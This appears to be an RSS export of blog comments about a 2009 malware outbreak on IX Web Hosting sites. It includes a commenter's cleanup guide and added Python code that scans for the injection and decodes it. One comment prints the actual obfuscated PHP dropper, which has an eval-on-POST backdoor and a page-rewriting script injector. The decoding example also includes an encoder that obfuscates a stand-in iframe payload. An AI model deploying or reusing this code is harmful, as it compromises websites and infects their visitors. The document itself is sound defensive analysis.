<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:georss="http://www.georss.org/georss" xmlns:geo="http://www.w3.org/2003/01/geo/wgs84_pos#" xmlns:media="http://search.yahoo.com/mrss/"
		>
<channel>
	<title>Comments on: More than ONE THIRD of ALL IX Web Hosting sites INFECTED</title>
	<atom:link href="http://ixwebhostwarning.wordpress.com/2009/01/08/more-than-one-third-of-all-ix-web-hosting-sites-infected/feed/" rel="self" type="application/rss+xml" />
	<link>http://ixwebhostwarning.wordpress.com/2009/01/08/more-than-one-third-of-all-ix-web-hosting-sites-infected/</link>
	<description>Unreliable, Insecure, Incompetent Web Hosting</description>
	<lastBuildDate>Thu, 05 Nov 2009 21:58:40 +0000</lastBuildDate>
	<generator>http://wordpress.com/</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: Fasteddy</title>
		<link>http://ixwebhostwarning.wordpress.com/2009/01/08/more-than-one-third-of-all-ix-web-hosting-sites-infected/#comment-220</link>
		<dc:creator>Fasteddy</dc:creator>
		<pubDate>Sat, 25 Apr 2009 11:14:36 +0000</pubDate>
		<guid isPermaLink="false">http://ixwebhostwarning.wordpress.com/?p=131#comment-220</guid>
		<description>How to get rid of the tmp_lkojfghx Virus 
(for want of a better name)

I battled this virus for a couple of months. It infected around a dozen of my websites and I think I understand how it operates and how to prevent it from spreading.

Overview.
This virus is a multi-pronged attack on websites and computers.
When you visit an infected site your PC may become infected. Your infected PC may be compromised with spyware, thus sending off FTP access information to the hackers. Hackers then use brute force to hack your password (if they don’t already have it). Your password and username are then used to hack your sites, which then become malware sites and spread the virus further. Your site may even become blacklisted by Google and other sites.

The Hackers’ Methods
My opinion is that they infect your computer when you hit an infected site. The infection is some kind of spyware (or keylogging) which extracts FTP info from your browser. Probably the username. They then hack the password using brute force.

The Website Attack
A malicious (but valid) login using FTP access rewrites many of your website files. (check your FTP logs and align the times with your file dates and times)

1. PHP files will have malicious PHP script inserted at the start of the file, bracketed by its own PHP tags. The original script is still present but is effectively disabled.
These PHP files, when accessed from the public domain, will do one of two things:
	They will firstly check for a variable sent by the POST method. This will be malicious code sent by the hacker and could vary each time.
	If no variable is present they will proceed to infect or re-infect the rest of the HTML files in your site.

2. HTML files will have malicious JAVASCRIPT inserted between the  and  tags. When this page is accessed from the public domain it proceeds to download malware into the visitor’s PC (possibly from some remote site). It will sometimes ask you to click to download a Microsoft add-on for this site. The computer then experiences a lot of disk activity and browser lockup. (information may be extracted at this point but I’m not sure)
Infected computers can slow down, experience browser hijacking and are probably infected with a keylogging virus or some other sort of spyware.


3. JavaScript files (ending in .js) will have the same script as the HTML files inserted at the end of the file. These JS files are linked to HTML pages and thus have the same effect as being inserted directly in the HTML page.

You can clean up the site but it will be attacked again in a few days and re-infected.

Symptoms
•Your web pages are slow loading…possibly while the malicious code communicates with its master
•When you visit the site, your computer starts frantic disk activity and the browser locks up (I suggest hitting the reset button and using System Restore at this stage)
•A bar at the top of the page prompts you to download a Microsoft Add-on

If your PC is compromised it may display the following symptoms
•Computer has generally slowed down
•You experience browser hijacking especially ‘search engine’ redirection
•Other websites that you manage start to get infected

Cure
1. Change your FTP login to a VERY STRONG PASSWORD - for example 14 characters with a mix of symbols included (use a clean PC that is not compromised). My experience is that simple passwords will get hacked again. Complex passwords will not.

2. Meticulously clean out all traces of the virus from your website by reloading pages or editing out the hack code. Check hidden directories for infected files. These may not show using your FTP client (go to the cPanel File Manager and have a look).

3. Cleanse your PC
•Scan with your virus protection software (mine didn’t find it)
•Use System Restore to revert back to before you got infected (this is the best way I have found)
•Reformat your disk, reload Windows and spend a couple of days reloading your PC

*Ensure that System Restore is Enabled on your PC</description>
		<content:encoded><![CDATA[<p>How to get rid of the tmp_lkojfghx Virus<br />
(for want of a better name)</p>
<p>I battled this virus for a couple of months. It infected around a dozen of my websites and I think I understand how it operates and how to prevent it from spreading.</p>
<p>Overview.<br />
This virus is a multi-pronged attack on websites and computers.<br />
When you visit an infected site your PC may become infected. Your infected PC may be compromised with spyware, thus sending off FTP access information to the hackers. Hackers then use brute force to hack your password (if they don’t already have it). Your password and username are then used to hack your sites, which then become malware sites and spread the virus further. Your site may even become blacklisted by Google and other sites.</p>
<p>The Hackers&#8217; Methods<br />
My opinion is that they infect your computer when you hit an infected site. The infection is some kind of spyware (or keylogging) which extracts FTP info from your browser. Probably the username. They then hack the password using brute force. </p>
<p>The Website Attack<br />
A malicious (but valid) login using FTP access rewrites many of your website files. (check your FTP logs and align the times with your file dates and times)</p>
<p>1. PHP files will have malicious PHP script inserted at the start of the file, bracketed by its own PHP tags. The original script is still present but is effectively disabled.<br />
These PHP files, when accessed from the public domain, will do one of two things:<br />
	They will firstly check for a variable sent by the POST method. This will be malicious code sent by the hacker and could vary each time.<br />
	If no variable is present they will proceed to infect or re-infect the rest of the HTML files in your site.</p>
<p>2. HTML files will have malicious JAVASCRIPT inserted between the  and  tags. When this page is accessed from the public domain it proceeds to download malware into the visitor’s PC (possibly from some remote site). It will sometimes ask you to click to download a Microsoft add-on for this site. The computer then experiences a lot of disk activity and browser lockup. (information may be extracted at this point but I’m not sure)<br />
Infected computers can slow down, experience browser hijacking and are probably infected with a keylogging virus or some other sort of spyware.</p>
<p>3. JavaScript files (ending in .js) will have the same script as the HTML files inserted at the end of the file. These JS files are linked to HTML pages and thus have the same effect as being inserted directly in the HTML page.</p>
<p>You can clean up the site but it will be attacked again in a few days and re-infected.</p>
<p>Symptoms<br />
•Your web pages are slow loading…possibly while the malicious code communicates with its master<br />
•When you visit the site, your computer starts frantic disk activity and the browser locks up (I suggest hitting the reset button and using System Restore at this stage)<br />
•A bar at the top of the page prompts you to download a Microsoft Add-on</p>
<p>If your PC is compromised it may display the following symptoms<br />
•Computer has generally slowed down<br />
•You experience browser hijacking especially ‘search engine’ redirection<br />
•Other websites that you manage start to get infected</p>
<p>Cure<br />
1. Change your FTP login to a VERY STRONG PASSWORD &#8211;  for example 14 characters with a mix of symbols included (use a clean pc that is not compromised) My experience is that simple passwords will get hacked again. Complex passwords will not.</p>
<p>2. Meticulously clean out all traces of the virus from your website by reloading pages or editing out the hack code. Check hidden directories for infected files. These may not show using your FTP client (go to the cPanel File Manager and have a look).</p>
<p>3. Cleanse your PC<br />
•Scan with your virus protection software (mine didn’t find it)<br />
•Use System Restore to revert back to before you got infected (this is the best way I have found)<br />
•Reformat your disk, reload Windows and spend a couple of days reloading your PC</p>
<p>*Ensure that System Restore is Enabled on your PC</p>
]]></content:encoded>
	</item>
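<![CDATA[
A scanner for the three file shapes Fasteddy describes above (and for the dropper-appended-to-wp-config.php case Eric reports further down the thread), added here as an example; it is not code from any commenter or from the hosting company. It relies only on identifiers visible in the thread: the tmp_lkojfghx function and tmp_lkojfghx3 POST parameter from Eric's paste, and the "Yahoo! Counter starts" / "counter end" comments that the base64 constant in that paste decodes to. The sample site it builds, the shortened dropper and script bodies, and the assumption that a prepended dropper ends at the first ?> after its function_exists() guard are all constructed for the example.

```python
"""Find and strip the tmp_lkojfghx / "Yahoo! Counter" injection in a web root.
Added example, not code from the original post: it rebuilds the injection
shapes Fasteddy describes (dropper prepended to PHP, script block in HTML,
script block appended to .js) and the one Eric reports (dropper appended to
wp-config.php) in a constructed temp-dir site, then scans and cleans it.
The dropper and script bodies are shortened stand-ins, not the real samples.
"""
import os
import re
import tempfile

# Markers from Eric's paste: the function the dropper defines and the
# POST parameter it eval()s.
PHP_MARKERS = ("tmp_lkojfghx", "eval($_POST[")
# Dropper prepended to a PHP file: a <?php ... ?> block at offset 0 opening
# with the function_exists() guard. Assumption: it ends at the first ?>.
PHP_PREFIX_RE = re.compile(
    r"\A<\?php\s+if\(!function_exists\('tmp_lkojfghx'\)\).*?\?>[ \t]*\r?\n?", re.S)
# Injected script block, bracketed by the HTML comments the first base64
# constant in Eric's paste decodes to.
JS_BLOCK_RE = re.compile(
    r"<script[^>]*>\s*<!--\s*Yahoo! Counter starts.*?"
    r"<!--\s*counter end\s*-->\s*</script>[ \t]*\r?\n?", re.I | re.S)


def php_infection(text):
    """(infected, cleaned); cleaned is None when the dropper is present but
    not in the prepended form, so a human has to cut it out."""
    if not any(marker in text for marker in PHP_MARKERS):
        return False, None
    m = PHP_PREFIX_RE.match(text)
    return True, (text[m.end():] if m else None)  # None: e.g. Eric's wp-config.php


def script_infection(text):
    """(infected, cleaned) for HTML and .js files."""
    cleaned, hits = JS_BLOCK_RE.subn("", text)
    return hits > 0, (cleaned if hits else None)


CHECKS = {".php": php_infection, ".html": script_infection, ".js": script_infection}


def scan_tree(root):
    """Walk everything under root (dot-directories included, since an FTP
    client may hide them), clean what is unambiguous, return {path: verdict}."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            check = CHECKS.get(os.path.splitext(name)[1].lower())
            if check is None:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="surrogateescape") as fh:
                text = fh.read()
            infected, cleaned = check(text)
            if not infected:
                continue
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            findings[rel] = "review" if cleaned is None else "cleaned"
            if cleaned is not None:
                with open(path, "w", encoding="utf-8", errors="surrogateescape") as fh:
                    fh.write(cleaned)
    return findings


# Constructed stand-ins carrying the real markers but none of the real logic.
DROPPER = ("<?php if(!function_exists('tmp_lkojfghx')){"
           "if(isset($_POST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);"
           "/* rest of dropper omitted in this stand-in */}?>\n")
SCRIPT_BLOCK = ("<script language=javascript><!-- Yahoo! Counter starts \n"
                "if(typeof(yahoo_counter)!=typeof(1))eval(unescape('%2F%2Fstand-in'));"
                "var yahoo_counter=1;\n<!-- counter end --></script>\n")
SAMPLE_SITE = {
    "index.php": DROPPER + "<?php echo 'home'; ?>\n",
    "wp-config.php": "<?php define('DB_NAME', 'blog');\n" + DROPPER,
    "about.html": "<html><body><p>about</p>\n" + SCRIPT_BLOCK + "</body></html>\n",
    "js/app.js": "function ready(){}\n" + SCRIPT_BLOCK,
    ".old/page.html": "<html><body></body></html>\n",  # clean file in a hidden dir
    "logo.png": "binary, not scanned",
}


def build_sample_site():
    root = tempfile.mkdtemp(prefix="ixscan_")
    for rel, content in SAMPLE_SITE.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w", encoding="utf-8") as fh:
            fh.write(content)
    return root


def demo():
    """Build the sample site, scan it, return (findings, cleaned contents)."""
    root = build_sample_site()
    findings = scan_tree(root)
    after = {}
    for rel in ("index.php", "about.html", "js/app.js"):
        with open(os.path.join(root, *rel.split("/")), encoding="utf-8") as fh:
            after[rel] = fh.read()
    return findings, after
```

Run it against a copy of the site pulled down over FTP or from the cPanel file manager rather than the live tree, and diff before and after. Files marked review (the dropper somewhere other than offset 0, as in Eric's wp-config.php) still need hand cleaning, and any file whose modification time lines up with the FTP-log entries Fasteddy mentions deserves a look even when neither pattern matches.
]]>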
	<item>
		<title>By: Eric</title>
		<link>http://ixwebhostwarning.wordpress.com/2009/01/08/more-than-one-third-of-all-ix-web-hosting-sites-infected/#comment-42</link>
		<dc:creator>Eric</dc:creator>
		<pubDate>Fri, 09 Jan 2009 03:07:54 +0000</pubDate>
		<guid isPermaLink="false">http://ixwebhostwarning.wordpress.com/?p=131#comment-42</guid>
		<description>Here&#039;s the code:

&lt;?php if(!function_exists(&#039;tmp_lkojfghx&#039;)){for($i=1;$i&lt;100;$i++)if(is_file($f=&#039;/tmp/m&#039;.$i)){include_once($f);break;}if(isset($_POST[&#039;tmp_lkojfghx3&#039;]))eval($_POST[&#039;tmp_lkojfghx3&#039;]);if(!defined(&#039;TMP_XHGFJOKL&#039;))define(&#039;TMP_XHGFJOKL&#039;,base64_decode(&#039;PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIAppZih0eXBlb2Yoe
WFob29fY291bn
RlcikhPXR5cGVvZigxKSlldmFsKHVuZXNjYXBlKCcvJTJGJTNDJCU2NCU2OSU3NiUyMCU3MyU3NHx5JTZDZSE9JTY0aSU3
M3AlNkMmYXx5JTNBIW4lNkZuJTY1QCUzRVxuI2RAJTZGYyU3NW0lNjUjbnQkJTJFJTc3JTcyJTY5fHQlNjUoISUyMiElM0
MvfCU3NCU2NSMlNzgjdHxhciU2NSYlNjElM0UiQCUyOSE7fnZhciUyMGlgJTJDX34sfmE9JCU1QiYlMjIlMzdAOEAuJTMxMWAw
JTJFITEmNzUuJCUzMiUzMSUyMiYlMkMiJTMxJTM5fjV+LjIlMzRgLiUzNzZgLiUzMjVAJTMxfCIlNURgJTNCXyUzRCUzMXw7a
WYlMjh+ZG9jQCU3NUBtZSZudH4lMkVjbyQlNkYlNkIlNjlgZX4lMkV+bSU2MSF0fiU2M0BoJiUyOCQlMkZ+JTVDYiQlNjhg
Z34lNjZ8dH49IzEvJTI5QD09ISU2RX4lNzVsJTZDJTI5ZiU2RmAlNzIlMjgmJTY5PUAwfjskJTY5IyUzQyEyQCUzQmBpJTJ
CJTJCKUAlNjRgb2BjISU3NW1+JTY1biU3NCMlMkV+d3J+aSF0fiU2NXwlMjgjJTIyJCUzQyU3MyU2M35yJTY5IyU3MGAlNz
RAJTNFJCU2OSZmJCUyOCU1RiMlMjlkQCU2RiQlNjMmdUBtJTY1JTZFdC5gJTc3IXIlNjklNzRAJTY1QCgmJTVDfiUyMiUzQy
U3MyZjfHIlNjlwdCUyMCU2OSU2NCUzRGAlNUZgIitpIyUyQiUyMn4lNUYlMjBgc0AlNzIlNjMmPSQlMkZgLyEiKyU2MSU1Qnwl
NjklNUQlMkIlMjIlMkYjY3AlMkY/Iit+bmEmdmlnJTYxI3RvJTcyJTJFJTYxJTcwcGBOYXxtZWAuJTYzJTY4YGEkJTcyISU0MX
QoJTMwJTI5KyElMjJgJTNFJTNDJTVDJTVDfiUyRnMlNjMhcml+cCU3NCElM0UhJTVDJCUyMiYlMjklM0N8JTVDISUyRiU3M3
wlNjMlNzJpcCQlNzQlM0UlMjIlMjlgOyFcbi8lMkYlM0MvISU2NCU2OSZ2JiUzRScpLnJlcGxhY2UoL2B8XCZ8XCR8I3xcIXxcf
Hx+fEAvZywiIikpO3ZhciB5YWhvb19jb3VudGVyPTE7CjwhLS0gY291bnRlciBlbmQgLS0+PC9zY3JpcHQ+Cg==&#039;));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))==&#039;1f8b&#039;))$s=gzinflate(substr($s,10,-8));if(preg_match_all(&#039;#&lt;script(.*?)#is&#039;,$s,$a))foreach($a[0] as $v)if(count(explode(&quot;\n&quot;,$v))&gt;5){$e=preg_match(&#039;#[\&#039;\&quot;][^\s\&#039;\&quot;\.,;\?!\[\]:/\(\)]{30,}#&#039;,$v)&#124;&#124;preg_match(&#039;#[\(\[](\s*\d+,){20,}#&#039;,$v);if((preg_match(&#039;#\beval\b#&#039;,$v)&amp;&amp;($e&#124;&#124;strpos($v,&#039;fromCharCode&#039;)))&#124;&#124;($e&amp;&amp;strpos($v,&#039;document.write&#039;)))$s=str_replace($v,&#039;&#039;,$s);}$s1=preg_replace(base64_decode(&#039;IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw==&#039;),&#039;&#039;,$s);if(stristr($s,&#039;&lt;/body&#039;))$s=preg_replace(&#039;#(\s*&lt;/body)#mi&#039;,str_replace(&#039;\$&#039;,&#039;\\\$&#039;,TMP_XHGFJOKL).&#039;\1&#039;,$s1);elseif(($s1!=$s)&#124;&#124;defined(&#039;PMT_knghjg&#039;)&#124;&#124;stristr($s,&#039;&lt;body&#039;)&#124;&#124;stristr($s,&#039;&#039;))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&amp;&amp;$GLOBALS[&#039;tmp_xhgfjokl&#039;])call_user_func($GLOBALS[&#039;tmp_xhgfjokl&#039;],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v[&#039;name&#039;])==&#039;tmp_lkojfghx&#039;)return;else $s[]=array($a==&#039;default output handler&#039;?false:$a);for($i=count($s)-1;$i&gt;=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(&#039;tmp_lkojfghx&#039;);for($i=0;$i


My sites run on the server block with MySQL address mysql501.ixwebhosting.com. As a note, this is part of the new server block that runs PHP5.</description>
		<content:encoded><![CDATA[<p>Here&#8217;s the code:</p>
<p>&lt;?php if(!function_exists(&#039;tmp_lkojfghx&#039;)){for($i=1;$i&lt;100;$i++)if(is_file($f=&#039;/tmp/m&#039;.$i)){include_once($f);break;}if(isset($_POST[&#039;tmp_lkojfghx3&#039;]))eval($_POST[&#039;tmp_lkojfghx3&#039;]);if(!defined(&#039;TMP_XHGFJOKL&#039;))define(&#039;TMP_XHGFJOKL&#039;,base64_decode(&#039;PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2NyaXB0PjwhLS0gWWFob28hIENvdW50ZXIgc3RhcnRzIAppZih0eXBlb2Yoe<br />
WFob29fY291bn<br />
RlcikhPXR5cGVvZigxKSlldmFsKHVuZXNjYXBlKCcvJTJGJTNDJCU2NCU2OSU3NiUyMCU3MyU3NHx5JTZDZSE9JTY0aSU3<br />
M3AlNkMmYXx5JTNBIW4lNkZuJTY1QCUzRVxuI2RAJTZGYyU3NW0lNjUjbnQkJTJFJTc3JTcyJTY5fHQlNjUoISUyMiElM0<br />
MvfCU3NCU2NSMlNzgjdHxhciU2NSYlNjElM0UiQCUyOSE7fnZhciUyMGlgJTJDX34sfmE9JCU1QiYlMjIlMzdAOEAuJTMxMWAw<br />
JTJFITEmNzUuJCUzMiUzMSUyMiYlMkMiJTMxJTM5fjV+LjIlMzRgLiUzNzZgLiUzMjVAJTMxfCIlNURgJTNCXyUzRCUzMXw7a<br />
WYlMjh+ZG9jQCU3NUBtZSZudH4lMkVjbyQlNkYlNkIlNjlgZX4lMkV+bSU2MSF0fiU2M0BoJiUyOCQlMkZ+JTVDYiQlNjhg<br />
Z34lNjZ8dH49IzEvJTI5QD09ISU2RX4lNzVsJTZDJTI5ZiU2RmAlNzIlMjgmJTY5PUAwfjskJTY5IyUzQyEyQCUzQmBpJTJ<br />
CJTJCKUAlNjRgb2BjISU3NW1+JTY1biU3NCMlMkV+d3J+aSF0fiU2NXwlMjgjJTIyJCUzQyU3MyU2M35yJTY5IyU3MGAlNz<br />
RAJTNFJCU2OSZmJCUyOCU1RiMlMjlkQCU2RiQlNjMmdUBtJTY1JTZFdC5gJTc3IXIlNjklNzRAJTY1QCgmJTVDfiUyMiUzQy<br />
U3MyZjfHIlNjlwdCUyMCU2OSU2NCUzRGAlNUZgIitpIyUyQiUyMn4lNUYlMjBgc0AlNzIlNjMmPSQlMkZgLyEiKyU2MSU1Qnwl<br />
NjklNUQlMkIlMjIlMkYjY3AlMkY/Iit+bmEmdmlnJTYxI3RvJTcyJTJFJTYxJTcwcGBOYXxtZWAuJTYzJTY4YGEkJTcyISU0MX<br />
QoJTMwJTI5KyElMjJgJTNFJTNDJTVDJTVDfiUyRnMlNjMhcml+cCU3NCElM0UhJTVDJCUyMiYlMjklM0N8JTVDISUyRiU3M3<br />
wlNjMlNzJpcCQlNzQlM0UlMjIlMjlgOyFcbi8lMkYlM0MvISU2NCU2OSZ2JiUzRScpLnJlcGxhY2UoL2B8XCZ8XCR8I3xcIXxcf<br />
Hx+fEAvZywiIikpO3ZhciB5YWhvb19jb3VudGVyPTE7CjwhLS0gY291bnRlciBlbmQgLS0+PC9zY3JpcHQ+Cg==&#039;));function tmp_lkojfghx($s){if($g=(bin2hex(substr($s,0,2))==&#039;1f8b&#039;))$s=gzinflate(substr($s,10,-8));if(preg_match_all(&#039;#&lt;script(.*?)#is&#039;,$s,$a))foreach($a[0] as $v)if(count(explode(&quot;\n&quot;,$v))&gt;5){$e=preg_match(&#039;#[\&#039;\&quot;][^\s\&#039;\&quot;\.,;\?!\[\]:/\(\)]{30,}#&#039;,$v)&#124;&#124;preg_match(&#039;#[\(\[](\s*\d+,){20,}#&#039;,$v);if((preg_match(&#039;#\beval\b#&#039;,$v)&amp;&amp;($e&#124;&#124;strpos($v,&#039;fromCharCode&#039;)))&#124;&#124;($e&amp;&amp;strpos($v,&#039;document.write&#039;)))$s=str_replace($v,&#039;&#039;,$s);}$s1=preg_replace(base64_decode(&#039;IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw==&#039;),&#039;&#039;,$s);if(stristr($s,&#039;&lt;/body&#039;))$s=preg_replace(&#039;#(\s*&lt;/body)#mi&#039;,str_replace(&#039;\$&#039;,&#039;\\\$&#039;,TMP_XHGFJOKL).&#039;\1&#039;,$s1);elseif(($s1!=$s)&#124;&#124;defined(&#039;PMT_knghjg&#039;)&#124;&#124;stristr($s,&#039;&lt;body&#039;)&#124;&#124;stristr($s,&#039;&#039;))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&amp;&amp;$GLOBALS[&#039;tmp_xhgfjokl&#039;])call_user_func($GLOBALS[&#039;tmp_xhgfjokl&#039;],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v[&#039;name&#039;])==&#039;tmp_lkojfghx&#039;)return;else $s[]=array($a==&#039;default output handler&#039;?false:$a);for($i=count($s)-1;$i&gt;=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start(&#039;tmp_lkojfghx&#039;);for($i=0;$i</p>
<p>My sites run on the server block with MySQL address mysql501.ixwebhosting.com. As a note, this is part of the new server block that runs PHP5.</p>
]]></content:encoded>
	</item>
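<![CDATA[
The constant Eric pasted can be decoded layer by layer. What follows is an added example, not code from Eric or anyone else in the thread: TMP_XHGFJOKL is base64 of a script block whose body is eval(unescape('...'.replace(/`|\&|\$|#|\!|\||~|@/g,""))), so the real JavaScript is percent-encoded with junk characters scattered through it, wrapped in the "Yahoo! Counter" comments, then base64-encoded. The example rebuilds that chain around a constructed stand-in script (its URL is invented) and then peels it back the way the browser would. The shorter base64 literal, the PCRE the dropper uses to remove an earlier copy of its own script block, is copied from the paste and decoded as-is.

```python
"""Peel the layers of the "Yahoo! Counter" injector constant.
Added example, not code from the original post. The inner script is a
constructed stand-in; only SELF_REMOVAL_RE_B64 is copied from Eric's paste.
"""
import base64
import random
import re
from urllib.parse import unquote

# Characters the wrapper's .replace() deletes before unescape().
JUNK = "`&$#!|~@"
JUNK_RE = re.compile("[" + re.escape(JUNK) + "]")

# Wrapper of the same shape as the decoded constant (stand-in text).
WRAPPER_HEAD = ("<script language=javascript><!-- Yahoo! Counter starts \n"
                "if(typeof(yahoo_counter)!=typeof(1))eval(unescape('")
WRAPPER_TAIL = ("'.replace(/`|\\&|\\$|#|\\!|\\||~|@/g,\"\")));"
                "var yahoo_counter=1;\n<!-- counter end --></script>\n")
INNER_RE = re.compile(r"unescape\(\s*'([^']*)'")

# Second base64 literal in Eric's paste: the PCRE the dropper runs over
# the page to strip an earlier copy of its script block before re-injecting.
SELF_REMOVAL_RE_B64 = "IzxzY3JpcHQgbGFuZ3VhZ2U9amF2YXNjcmlwdD48IS0tIFlhaG9vISBDb3VudGVyIHN0YXJ0cy4rPzwvc2NyaXB0Pgojcw=="

# Constructed inner payload; the hostname is a placeholder, not from the thread.
CONSTRUCTED_SCRIPT = ("document.write('<iframe src=\"http://malware.example.invalid/c\" "
                      "width=1 height=1></iframe>');")


def obfuscate_inner(script, rng):
    """Forward direction (what the attacker's builder does): percent-encode
    every non-alphanumeric character and, at random, alphanumerics too, then
    sprinkle JUNK between tokens. A JUNK character is never left unencoded,
    or the wrapper's own replace() would corrupt the payload."""
    if not script.isascii():
        raise ValueError("stand-in encoder handles ASCII only")
    out = []
    for i, ch in enumerate(script):
        if ch.isalnum() and rng.random() < 0.5:
            out.append(ch)
        else:
            out.append("%{:02X}".format(ord(ch)))
        if i == 0 or rng.random() < 0.3:
            out.append(rng.choice(JUNK))
    return "".join(out)


def build_constant(script, seed=7):
    """Produce a base64 constant of the same shape as TMP_XHGFJOKL."""
    inner = obfuscate_inner(script, random.Random(seed))
    wrapper = WRAPPER_HEAD + inner + WRAPPER_TAIL
    return base64.b64encode(wrapper.encode("utf-8")).decode("ascii")


def decode_constant(b64):
    """Reverse direction (what the analyst does): base64 -> wrapper ->
    unescape() argument -> junk stripped -> percent-decoded script."""
    wrapper = base64.b64decode(b64).decode("utf-8")
    m = INNER_RE.search(wrapper)
    if m is None:
        raise ValueError("wrapper has no unescape('...') call")
    encoded = m.group(1)
    stripped = JUNK_RE.sub("", encoded)
    return {"wrapper": wrapper, "encoded": encoded,
            "stripped": stripped, "script": unquote(stripped)}


def self_removal_regex():
    """Decode the dropper's own clean-up regex (PHP PCRE, # delimiters, /s)."""
    return base64.b64decode(SELF_REMOVAL_RE_B64).decode("utf-8")


def demo():
    layers = decode_constant(build_constant(CONSTRUCTED_SCRIPT))
    layers["original"] = CONSTRUCTED_SCRIPT
    layers["self_removal_regex"] = self_removal_regex()
    return layers
```

The decoded self-removal regex doubles as the cheapest signature to grep a site for: the dropper has to find its own earlier block with that pattern before it re-injects, so the "Yahoo! Counter starts" comment survives every re-infection even while the percent-encoded body underneath it changes.
]]>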
	<item>
		<title>By: neverixweb</title>
		<link>http://ixwebhostwarning.wordpress.com/2009/01/08/more-than-one-third-of-all-ix-web-hosting-sites-infected/#comment-41</link>
		<dc:creator>neverixweb</dc:creator>
		<pubDate>Fri, 09 Jan 2009 01:40:17 +0000</pubDate>
		<guid isPermaLink="false">http://ixwebhostwarning.wordpress.com/?p=131#comment-41</guid>
		<description>Hi Eric.
Thanks for taking the time to post about your issue, and the whereabouts of the injected script.
It is true that the script is Base64-coded. Could you post your code here if you still have it, and could you please let me know on what servers your site(s) are hosted?
Good Luck with your sites.</description>
		<content:encoded><![CDATA[<p>Hi Eric.<br />
Thanks for taking the time to post about your issue, and the whereabouts of the injected script.<br />
It is true that the script is Base64-coded. Could you post your code here if you still have it, and could you please let me know on what servers your site(s) are hosted?<br />
Good Luck with your sites.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Eric</title>
		<link>http://ixwebhostwarning.wordpress.com/2009/01/08/more-than-one-third-of-all-ix-web-hosting-sites-infected/#comment-40</link>
		<dc:creator>Eric</dc:creator>
		<pubDate>Fri, 09 Jan 2009 00:56:45 +0000</pubDate>
		<guid isPermaLink="false">http://ixwebhostwarning.wordpress.com/?p=131#comment-40</guid>
		<description>I also made the mistake of hosting with IX. One of my WordPress (WPMU v2.7) blogs was recently infected with the so-called &quot;Yahoo! Counter&quot; virus. I wasted an entire afternoon looking for the code, which is encrypted in Base64 to avoid detection when searching with terms like &quot;Yahoo&quot;.

I finally found the code at the very end of my wp-config.php file (compare to wp-config-sample.php if you have it). This file had 755 permissions.

@neverixweb: Could you mention this in a post? I couldn&#039;t find a clear fix for wordpress users on Google so I thought I&#039;d contribute mine.</description>
		<content:encoded><![CDATA[<p>I also made the mistake of hosting with IX. One of my WordPress (WPMU v2.7) blogs was recently infected with the so-called &#8220;Yahoo! Counter&#8221; virus. I wasted an entire afternoon looking for the code, which is encrypted in Base64 to avoid detection when searching with terms like &#8220;Yahoo&#8221;.</p>
<p>I finally found the code at the very end of my wp-config.php file (compare to wp-config-sample.php if you have it). This file had 755 permissions.</p>
<p>@neverixweb: Could you mention this in a post? I couldn&#8217;t find a clear fix for wordpress users on Google so I thought I&#8217;d contribute mine.</p>
]]></content:encoded>
	</item>
</channel>
</rss>
